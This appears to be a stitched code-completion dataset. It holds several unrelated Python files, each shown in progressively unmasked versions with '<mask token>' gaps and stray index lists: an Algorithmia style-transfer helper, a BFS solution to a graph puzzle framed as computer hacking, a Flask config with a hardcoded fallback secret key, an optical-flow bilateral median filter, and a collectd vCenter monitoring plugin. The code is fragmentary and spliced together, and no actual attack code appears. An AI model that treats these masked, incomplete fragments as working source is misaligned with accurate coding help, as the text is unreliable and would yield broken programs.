def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {
"images": [ORIGINAL_DATA_DIR + Path(im).name for im in fnames],
"savePaths": [TRANSFERD_DATA_DIR + Path(im).name for im in fnames],
"filterName": filter_name
}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
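# A minimal invocation sketch; it assumes ALGO_API_KEY and DATA_DIR are set
# in the environment, and 'gan_vogh' stands in for whatever filter name the
# DeepFilter algorithm actually accepts.
#
#     result = style_transfer(['photos/cat.jpg'], 'out/', 'gan_vogh')
#     print(result)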
| [
2,
3,
4,
5,
6
] |
610 | 8a631adc8d919fb1dded27177818c4cb30148e94 | <mask token>
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
<mask token>
| <mask token>
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a)
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
<mask token>
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer)
| <mask token>
input = sys.stdin.readline
n, m = map(int, input().split())
graph = [[] for _ in range(n + 1)]
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a)
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
answer = []
max_cnt = 0
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer)
| from collections import deque
import sys
input = sys.stdin.readline
n, m = map(int, input().split())
graph = [[] for _ in range(n + 1)]
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a)
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
answer = []
max_cnt = 0
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer)
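# Worked example (illustrative): n=5, m=4 with trust pairs (3 1), (3 2),
# (4 3), (5 3). Hacking 1 or 2 reaches 4 computers each ({1,3,4,5} and
# {2,3,4,5}), hacking 3 reaches 3, and 4 or 5 reach only themselves, so
# the program prints "1 2".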
| # 효율적인 해킹
# https://www.acmicpc.net/problem/1325
from collections import deque
import sys
input = sys.stdin.readline
n, m = map(int, input().split())
graph = [[] for _ in range(n + 1)]
for _ in range(m):
a, b = map(int, input().split())
    graph[b].append(a) # hacking B also lets you hack A
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
    cnt = 1 # number of computers that can be hacked when hacking start
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
answer = []
max_cnt = 0
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer) | [
1,
2,
3,
4,
5
] |
611 | 833923c1928862e13c24904f5614927a683b168f | <mask token>
class DevelopmentConfig(Config):
<mask token>
<mask token>
<mask token>
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| <mask token>
class DevelopmentConfig(Config):
"""Development Config that extends the Base Config Object"""
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| <mask token>
class Config(object):
"""Base Config Object"""
DEBUG = False
SECRET_KEY = os.environ.get('SECRET_KEY') or 'Som3$ec5etK*y'
UPLOAD_FOLDER = './uploads'
<mask token>
class DevelopmentConfig(Config):
"""Development Config that extends the Base Config Object"""
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| import os
class Config(object):
"""Base Config Object"""
DEBUG = False
SECRET_KEY = os.environ.get('SECRET_KEY') or 'Som3$ec5etK*y'
UPLOAD_FOLDER = './uploads'
dbconfig = {'host': os.environ.get('MYSQL_HOST') or 'localhost', 'user': os
.environ.get('MYSQL_USER') or 'root', 'password': os.environ.get(
'MYSQL_PASSWORD') or '', 'db': os.environ.get('MYSQL_DB') or
'finalproject2.sql'}
class DevelopmentConfig(Config):
"""Development Config that extends the Base Config Object"""
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
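# A minimal wiring sketch (not shown in this file; the 'config' module path
# is an assumption about where these classes live):
#
#     from flask import Flask
#     app = Flask(__name__)
#     app.config.from_object('config.DevelopmentConfig')
#     assert app.config['DEBUG'] is True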
| null | [
4,
6,
9,
11
] |
612 | 1748c8dfcc3974b577d7bfacb5cabe4404b696bc | <mask token>
| <mask token>
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
    :param log_occlusen: np.array(float) (Height, Width), log of the occlusion map
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
| import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
    :param log_occlusen: np.array(float) (Height, Width), log of the occlusion map
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 *
sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color *
sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
weigth = math.exp(-exponent + occlusen_compared -
occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))
for idx_1 in range(n + 1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])
result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])
print('result_flow')
print(result_flow.flatten())
return result_flow
| import math
import numpy as np
from statistics import median
from src.filter.median import quickselect_median
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,
sigma_distance = 7, sigma_color =7 / 200, filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
    :param log_occlusen: np.array(float) (Height, Width), log of the occlusion map
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size+1)
helper_flow_y_list = [0.0] * (helper_list_size+1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2
exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)
exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)
occlusen_current = log_occlusen[y][x]
occlusen_compared = log_occlusen[y_compare][x_compare]
#weigth = math.exp(-exponent) * occlusen_compared / occlusen_current
weigth = math.exp(-exponent+occlusen_compared-occlusen_current)
weigths_list[counter] = weigth
helper_flow_x_list[counter] = flow[1][y_compare][x_compare]
helper_flow_y_list[counter] = flow[0][y_compare][x_compare]
counter += 1
# See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING
# 3.13
n = counter
f_x = auxiliary_field[1][y][x]
f_y = auxiliary_field[0][y][x]
scalar = 1/(2*(weigth_auxiliary / weigth_filter))
for idx_1 in range(n+1):
sum = 0
for idx_2 in range(idx_1):
sum -= weigths_list[idx_2]
for idx_2 in range(idx_1, n):
sum += weigths_list[idx_2]
helper_flow_x_list[n + idx_1] = f_x + scalar * sum
helper_flow_y_list[n + idx_1] = f_y + scalar * sum
result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])
result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])
print("result_flow")
print(result_flow.flatten())
return result_flow
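# Shape-only smoke test (a sketch; the values are arbitrary). Note that the
# pure-Python loops make this O(Height * Width * filter_size**2) per frame,
# so it is slow on real images.
#
#     import numpy as np
#     flow = np.zeros((2, 4, 4))     # (YX, Height, Width)
#     occ = np.zeros((4, 4))         # log-occlusion, log(1) = 0 everywhere
#     aux = np.zeros((2, 4, 4))
#     img = np.zeros((1, 4, 4))      # one color channel
#     out = bilateral_median_filter(flow, occ, aux, img,
#                                   weigth_auxiliary=1.0, weigth_filter=1.0)
#     assert out.shape == (2, 4, 4)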
| null | [
0,
1,
2,
3
] |
613 | 55f76ae1ffe0fb2d2ca2c7a20aab45ffb00cf178 | <mask token>
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
        if record.levelno == logging.DEBUG and not self.verbose:
            return
        handler = self._handler_map[record.levelno]
handler(record.getMessage())
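# Typical collectd-python wiring (a sketch; the registration step is not
# shown in this excerpt, and the constructor arguments are placeholders):
#
#     collector = CollectdCollector(vcenters=[])
#     collectd.register_config(collector.configure)
#     collectd.register_read(collector.read)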
<mask token>
| <mask token>
class Collector(object):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize', 'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100
mem_percent = mem_usage / float(mem_total) * 100
stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':
cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,
'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':
mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,
'vms_stopped': vms_stopped}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
        if record.levelno == logging.DEBUG and not self.verbose:
            return
        handler = self._handler_map[record.levelno]
handler(record.getMessage())
<mask token>
| <mask token>
class Collector(object):
def __init__(self, vcenters, username=None, password=None, verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
The password associated with the specified user.
:param bool verbose: (optional)
Whether to enable verbose logging.
:param int sleep_time: (optional)
Number of seconds to wait between polls.
"""
self.vcenters = vcenters
self.username = username
self.password = password
self.verbose = verbose
if COLLECTD_ENABLED:
self.log = logging.getLogger()
self.log.addHandler(CollectdHandler(self.verbose))
else:
logging.basicConfig(level=logging.DEBUG)
self.log = logging.getLogger()
def poll(self):
"""
Collect current performance information.
"""
stats = {}
for vcenter in self.vcenters:
stats[vcenter] = self.poll_vcenter(vcenter)
return stats
def poll_vcenter(self, vcenter):
"""
Open a connection to the specified vCenter server and begin gathering
information about its datastores, datacenters, clusters, and hosts.
:param str vcenter:
The hostname or IP of a vCenter server.
:returns:
A dictionary containing information about the current state of
objects managed by the specified vCenter.
"""
self.log.debug('polling %s@%s' % (self.username, vcenter))
server = VIServer()
try:
server.connect(vcenter, self.username, self.password)
except:
self.log.exception('Failed to connect to %s' % (vcenter,))
return {}
stats = {'datastore': {}, 'datacenter': {}}
for obj, name in server.get_datastores().items():
ds_stats = self.poll_datastore(server, obj, name)
stats['datastore'][name] = ds_stats
datacenters = server.get_datacenters()
for obj, name in datacenters.items():
dc_stats = self.poll_datacenter(server, obj, name)
stats['datacenter'][name] = dc_stats
return stats
<mask token>
def poll_datacenter(self, server, obj, name):
"""
Gather metrics about a specific datacenter.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the datacenter.
:param str name:
Name of the datacenter.
:returns:
A dictionary with several keys describing the current state of the
datacenter. This dictionary includes information about each cluster
and host that is part of the specified datacenter.
"""
if '.' in name:
name = name.split('.')[0]
stats = self._poll_group('datacenter', server, obj, name)
cluster_host_stats = self._poll_group('cluster', server, obj, name)
for key, value in cluster_host_stats.items():
if key not in stats:
stats[key] = value
elif isinstance(stats[key], dict):
for c_key, c_value in value.items():
stats[key][c_key] = c_value
elif 'percent' in key:
stats[key] = (stats[key] + value) / 2
else:
stats[key] += value
return stats
def poll_cluster(self, server, obj, name):
"""
Gather metrics about a specific cluster.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the cluster.
:param str name:
Name of the cluster.
:returns:
A dictionary with several keys describing the current state of the
cluster. This dictionary includes information about each host that
is part of the specified cluster.
"""
return self._poll_group('cluster', server, obj, name)
def _poll_group(self, group_type, server, obj, name):
"""
Generic metrics gathering for datacenters and clusters.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for a datacenter or cluster.
:param str name:
Name of a datacenter or cluster.
:returns:
A dictionary with several keys describing the current state of the
datacenter/cluster. This dictionary includes information about each
cluster and/or host that is part of the specified object.
"""
if group_type == 'datacenter':
find_children = server.get_clusters
poll_child = self.poll_cluster
child_type = 'cluster'
elif group_type == 'cluster':
find_children = server.get_hosts
poll_child = self.poll_host
child_type = 'host'
self.log.debug('start querying %s: %s' % (group_type, name))
children = find_children(obj)
self.log.debug('finish querying %s: %s' % (group_type, name))
cpu_total = cpu_usage = cpu_percent = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
child_stats = {}
for child_obj, child_name in children.items():
stats = poll_child(server, child_obj, child_name)
child_stats[child_name] = stats
cpu_total += stats['cpu_total']
cpu_usage += stats['cpu_usage']
mem_total += stats['mem_total']
mem_usage += stats['mem_usage']
vms_total += stats['vms_total']
vms_running += stats['vms_running']
vms_stopped += stats['vms_stopped']
if cpu_total > 0:
cpu_percent = cpu_usage / float(cpu_total) * 100
if mem_total > 0:
mem_percent = mem_usage / float(mem_total) * 100
group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,
'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':
mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,
'vms_running': vms_running, 'vms_stopped': vms_stopped,
child_type: child_stats}
return group_stats
def poll_host(self, server, obj, name):
"""
Gather metrics about a specific host.
:param VIServer server:
A valid connection to a vCenter server.
:param MOR obj:
Managed object for the host.
:param str name:
Name of the host.
:returns:
A dictionary with several keys describing the current state of the
host, including CPU, memory, and virtual machine information.
"""
self.log.debug('found host: %s' % (name,))
status = 0
cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0
mem_total = mem_usage = mem_percent = 0
vms_total = vms_running = vms_stopped = 0
if '.' in name and name.count('.') != 3:
name = name.split('.')[0]
props = server._retrieve_properties_traversal(property_names=[
'name', 'summary.overallStatus',
'summary.quickStats.overallMemoryUsage',
'summary.quickStats.overallCpuUsage',
'summary.hardware.memorySize', 'summary.hardware.numCpuCores',
'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')
for prop_set in props:
for prop in prop_set.PropSet:
pn, pv = prop.Name, prop.Val
if pn == 'summary.overallStatus':
status = HOST_STATUS.index(pv)
elif pn == 'summary.quickStats.overallMemoryUsage':
mem_usage = pv
elif pn == 'summary.quickStats.overallCpuUsage':
cpu_usage = pv
elif pn == 'summary.hardware.memorySize':
mem_total = pv / MB
elif pn == 'summary.hardware.numCpuCores':
cpu_count = pv
elif pn == 'summary.hardware.cpuMhz':
cpu_mhz_per_core = pv
vms_total = len(server.get_registered_vms(obj))
vms_running = len(server.get_registered_vms(obj, status='poweredOn'))
vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))
cpu_total = cpu_count * cpu_mhz_per_core
cpu_percent = cpu_usage / float(cpu_total) * 100 if cpu_total > 0 else 0
mem_percent = mem_usage / float(mem_total) * 100 if mem_total > 0 else 0
stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':
cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,
'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':
mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,
'vms_stopped': vms_stopped}
return stats
class CollectdCollector(Collector):
"""
Handle dispatching statistics to collectd.
"""
NAME = 'vCenter'
def __init__(self, *args, **kwargs):
super(CollectdCollector, self).__init__(*args, **kwargs)
self.sleep_time = kwargs.get('sleep_time', 20)
def configure(self, conf):
"""
Callback to configure the plugin based on collectd's settings.
"""
for node in conf.children:
key = node.key
val = node.values[0]
if key == 'Vcenter':
self.vcenters = val.split()
elif key == 'Username':
self.username = val
elif key == 'Password':
self.password = val
elif key == 'Verbose':
self.verbose = bool(val)
elif key == 'Sleep':
self.sleep_time = int(val)
else:
self.log.warn('Unknown config key: %s' % (key,))
def read(self):
"""
Callback to send data back to collectd.
"""
self.log.debug('Beginning read callback')
info = self.poll()
if not info:
self.log.warn('No data received')
return
def dispatch_host(name, data):
"""
Helper to reduce duplication
"""
for key, value in data.items():
self.dispatch(name, 'host_%s' % (key,), name, value)
for vcenter, data in info.items():
for ds_name, ds_data in data['datastore'].items():
for key, value in ds_data.items():
self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)
for dc_name, dc_data in data['datacenter'].items():
clusters = dc_data.pop('cluster', {})
hosts = dc_data.pop('host', {})
for key, value in dc_data.items():
self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)
for c_name, c_data in clusters.items():
c_hosts = c_data.pop('host', {})
for key, value in c_data.items():
o_type = 'cluster_%s' % (key,)
self.dispatch(dc_name, o_type, c_name, value)
for ch_name, ch_data in c_hosts.items():
dispatch_host(ch_name, ch_data)
for h_name, h_data in hosts.items():
dispatch_host(h_name, h_data)
time.sleep(self.sleep_time)
def dispatch(self, host, obj_type, obj_instance, value):
"""
Helper to clean up metric sending.
:param str host:
The name of the host to which the metric belongs.
:param str obj_type:
The type of metric to report.
:param str obj_instance:
An instance to associate with the metric.
:param int value:
The value of the metric.
"""
val = collectd.Values(type='gauge', plugin=self.NAME, host=host)
val.type_instance = obj_type
val.plugin_instance = obj_instance
val.values = [value]
val.dispatch()
class CollectdHandler(logging.Handler):
"""
Expose collectd logger using standard Python logging.
"""
def __init__(self, verbose=False, *args, **kwargs):
self.verbose = verbose
super(CollectdHandler, self).__init__(*args, **kwargs)
if COLLECTD_ENABLED:
self._handler_map = {logging.CRITICAL: collectd.error, logging.
ERROR: collectd.error, logging.WARN: collectd.warning,
logging.INFO: collectd.info, logging.DEBUG: collectd.info}
def emit(self, record):
if not COLLECTD_ENABLED:
return
if record.levelno == logging.DEBUG and not self.verbose:
return
handler = self._handler_map[record.levelno]
handler(record.getMessage())
<mask token>
| <mask token>
class Collector(object):
def __init__(self, vcenters, username=None, password=None, verbose=False):
"""
Configuration to poll a vCenter cluster for performance data.
:param list vcenters:
A list of one or more vCenter server IPs or hostnames.
:param str username:
The username to use to authenticate against the vCenter cluster.
:param str password:
